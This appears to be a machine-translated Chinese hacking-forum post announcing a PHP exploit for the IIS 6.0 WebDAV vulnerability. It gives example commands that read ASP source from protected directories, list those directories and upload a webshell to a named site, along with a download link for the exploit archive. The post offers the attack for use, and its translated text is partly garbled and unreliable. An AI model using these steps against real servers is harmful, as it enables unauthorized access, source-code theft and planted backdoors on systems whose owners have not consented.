IIS6. 0 the WEBDAV vulnerability video and related presentations forum.for several days. milw0rm. com yesterday also discloses A C version to use the program. His effect I don't know,haven't used. Now tian6. com domestic first publication of a scripting EXP.
In fact, the day before yesterday just wanted to Write A without having to compile the EXP. Unfortunately the hand is not on the environment,to build but also too much trouble,so yesterday looking for a friend,together to finish this EXP. Already announced
Instructions:(specific use or test method,please refer to the day the male made the video.)
_ Copy the code _
example: php.exe i.php source www.tian6.com /blog/readme. asp //查看 tian6.com,protected directory blog in the readme. asp source code
php.exe i.php path www.tian6.com /secret/ //查看 tian6.com,protected directory secret in all directories.
php.exe i.php put www.tian6.com /secret/ test.txt //the test. txt and i. php put together,inside is your WEBSHELL. Here the meaning is in thewww.tian6.comto a protected directory secret,from the local file test. txt read the content,then write to the secret directory. The default is racle. asp. But here there is a problem,the secret directory is protected,write into it, like can't run. Here is a very simple trick,we look carefully at the video.
PHPSHELL download address:http://l14of. ys168. com/note/fd. htm? http://ys-B. ys168. com/? i. rar_4s7bsn0d6e0bs7bsn0cl1btomq0cpn2bit7b5btomojkiu14z97f14z